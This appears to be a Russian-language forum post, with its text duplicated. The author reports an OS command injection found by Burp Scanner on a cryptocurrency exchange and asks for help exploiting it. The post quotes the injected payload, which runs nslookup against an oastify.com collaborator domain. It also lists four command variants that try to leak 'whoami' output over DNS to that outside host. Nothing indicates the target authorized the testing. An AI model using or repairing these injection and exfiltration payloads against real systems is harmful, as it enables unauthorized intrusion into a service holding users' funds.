Нужна помощь. на одной из бирж криптовалюты нашел.
OS command injection
The payload &nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&'\"`0&nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&`' was submitted in the Type parameter. The application performed a DNS lookup for the specified domain name.
Я создаю collaborator payload и меняю конечно пейлоад на тот который дал, потом в браузер. Но ничего не приходить на бурп.
Делал по разному, чтобы узнать whoami
nslookup whoami rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup 'whoami' rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami.rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami .rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
OS command injection
Issue detail
The Type parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was executed.The payload &nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&'\"`0&nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&`' was submitted in the Type parameter. The application performed a DNS lookup for the specified domain name.
Я создаю collaborator payload и меняю конечно пейлоад на тот который дал, потом в браузер. Но ничего не приходить на бурп.
Делал по разному, чтобы узнать whoami
nslookup whoami rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup 'whoami' rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami.rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami .rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
